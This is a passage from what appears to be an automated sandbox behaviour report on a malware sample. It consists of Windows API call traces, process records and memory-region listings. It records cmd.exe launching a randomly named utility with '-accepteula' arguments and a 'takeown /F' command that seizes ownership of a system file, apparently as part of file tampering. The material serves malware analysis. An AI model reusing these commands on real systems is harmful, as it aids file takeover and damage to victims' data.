lpData=0x9fe6e8, lpcbData=0x9fe6e4*=0x1000 | out: lpType=0x9fe6e0*=0x0, lpData=0x9fe6e8*=0x9, lpcbData=0x9fe6e4*=0x1000) returned 0x2 [0293.273] RegCloseKey (hKey=0x94) returned 0x0 [0293.273] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432ad [0293.273] srand (_Seed=0x5bb432ad) [0293.273] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner" [0293.273] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner" [0293.273] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.273] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xae7f40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0293.273] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0293.273] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0293.273] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0293.273] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.273] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0293.274] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0293.274] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0293.274] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0293.274] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0293.274] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0293.274] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0293.274] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0293.274] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0293.274] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9ff4b4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.274] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x9ff4b4, lpFilePart=0x9ff4ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9ff4ac*="Desktop") returned 0x1d [0293.274] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0293.274] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x9ff230 | out: lpFindFileData=0x9ff230) returned 0xae8150 [0293.274] FindClose (in: hFindFile=0xae8150 | out: hFindFile=0xae8150) returned 1 [0293.274] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x9ff230 | out: lpFindFileData=0x9ff230) returned 0xae8150 [0293.274] FindClose (in: hFindFile=0xae8150 | out: hFindFile=0xae8150) returned 1 [0293.274] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0293.274] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x9ff230 | out: lpFindFileData=0x9ff230) returned 0xae8150 [0293.275] FindClose (in: hFindFile=0xae8150 | out: hFindFile=0xae8150) returned 1 [0293.275] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0293.275] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0293.275] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0293.275] GetEnvironmentStringsW () returned 0xaea068* [0293.275] FreeEnvironmentStringsA (penv="=") returned 1 [0293.275] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0293.276] GetConsoleOutputCP () returned 0x1b5 [0293.496] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0293.496] GetUserDefaultLCID () returned 0x409 [0293.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0293.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x9ff5e4, cchData=128 | out: lpLCData="0") returned 2 [0293.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x9ff5e4, cchData=128 | out: lpLCData="0") returned 2 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x9ff5e4, cchData=128 | out: lpLCData="1") returned 2 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0293.497] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0293.497] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0293.498] GetConsoleTitleW (in: lpConsoleTitle=0xae8cd8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.602] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0293.602] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0293.602] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0293.602] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0293.603] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0293.603] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0293.603] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0293.603] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0293.603] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0293.603] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0293.603] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0293.604] GetConsoleTitleW (in: lpConsoleTitle=0x9ff2d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.605] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0293.605] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0293.606] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0293.607] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0293.608] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0293.608] SetErrorMode (uMode=0x0) returned 0x0 [0293.608] SetErrorMode (uMode=0x1) returned 0x0 [0293.608] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaea070, lpFilePart=0x9feddc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9feddc*="Desktop") returned 0x1d [0293.608] SetErrorMode (uMode=0x0) returned 0x1 [0293.608] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0293.608] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0293.612] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0293.613] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0293.613] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0x9feb88, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9feb88) returned 0xae9440 [0293.613] FindClose (in: hFindFile=0xae9440 | out: hFindFile=0xae9440) returned 1 [0293.613] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0293.613] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0293.613] GetConsoleTitleW (in: lpConsoleTitle=0x9ff05c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0293.614] InitializeProcThreadAttributeList (in: lpAttributeList=0x9fef88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x9fef6c | out: lpAttributeList=0x9fef88, lpSize=0x9fef6c) returned 1 [0293.614] UpdateProcThreadAttribute (in: lpAttributeList=0x9fef88, dwFlags=0x0, Attribute=0x60001, lpValue=0x9fef74, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x9fef88, lpPreviousValue=0x0) returned 1 [0293.614] GetStartupInfoW (in: lpStartupInfo=0x9fefc0 | out: lpStartupInfo=0x9fefc0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Sey", _MaxCount=0x7) returned -3 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0293.614] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0293.615] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0293.615] lstrcmpW (lpString1="\\vIDhS3md.exe", lpString2="\\XCOPY.EXE") returned -1 [0293.616] CreateProcessW (in: lpApplicationName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", lpCommandLine="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x9fef10*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9fef5c | out: lpCommandLine="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner", lpProcessInformation=0x9fef5c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x93c, dwThreadId=0x920)) returned 1 [0293.623] CloseHandle (hObject=0xa4) returned 1 [0293.623] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0293.623] GetEnvironmentStringsW () returned 0xae8150* [0293.623] FreeEnvironmentStringsA (penv="=") returned 1 [0293.623] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0295.999] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x9feef4 | out: lpExitCode=0x9feef4*=0x1) returned 1 [0295.999] CloseHandle (hObject=0xa8) returned 1 [0295.999] _vsnwprintf (in: _Buffer=0x9fefdc, _BufferCount=0x13, _Format="%08X", _ArgList=0x9feefc | out: _Buffer="00000001") returned 8 [0295.999] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0295.999] GetEnvironmentStringsW () returned 0xae8150* [0295.999] FreeEnvironmentStringsA (penv="=") returned 1 [0295.999] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0295.999] GetEnvironmentStringsW () returned 0xae8150* [0295.999] FreeEnvironmentStringsA (penv="=") returned 1 [0295.999] DeleteProcThreadAttributeList (in: lpAttributeList=0x9fef88 | out: lpAttributeList=0x9fef88) [0295.999] _get_osfhandle (_FileHandle=1) returned 0xc0 [0295.999] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0295.999] _get_osfhandle (_FileHandle=1) returned 0xc0 [0295.999] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0295.999] _get_osfhandle (_FileHandle=0) returned 0x38 [0295.999] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.018] SetConsoleInputExeNameW () returned 0x1 [0296.018] GetConsoleOutputCP () returned 0x1b5 [0296.018] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.018] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.018] exit (_Code=1) Thread: id = 965 os_tid = 0x884 Process: id = "132" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x2e9ab000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "118" os_parent_pid = "0x5c0" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9257 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x170000 region_type = mapped_file name = "takeown.exe" filename = "\\Windows\\SysWOW64\\takeown.exe" (normalized: "c:\\windows\\syswow64\\takeown.exe") Region: id = 9258 start_va = 0x8d0000 end_va = 0x48cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 9259 start_va = 0x48d0000 end_va = 0x48effff entry_point = 0x0 region_type = private name = "private_0x00000000048d0000" filename = "" Region: id = 9260 start_va = 0x48f0000 end_va = 0x48f1fff entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 9261 start_va = 0x4900000 end_va = 0x4913fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 9262 start_va = 0x4920000 end_va = 0x495ffff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 9263 start_va = 0x4960000 end_va = 0x499ffff entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 9264 start_va = 0x49a0000 end_va = 0x49a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049a0000" filename = "" Region: id = 9265 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9266 start_va = 0x7fa00000 end_va = 0x7fa22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fa00000" filename = "" Region: id = 9267 start_va = 0x7fa24000 end_va = 0x7fa24fff entry_point = 0x0 region_type = private name = "private_0x000000007fa24000" filename = "" Region: id = 9268 start_va = 0x7fa2b000 end_va = 0x7fa2bfff entry_point = 0x0 region_type = private name = "private_0x000000007fa2b000" filename = "" Region: id = 9269 start_va = 0x7fa2d000 end_va = 0x7fa2ffff entry_point = 0x0 region_type = private name 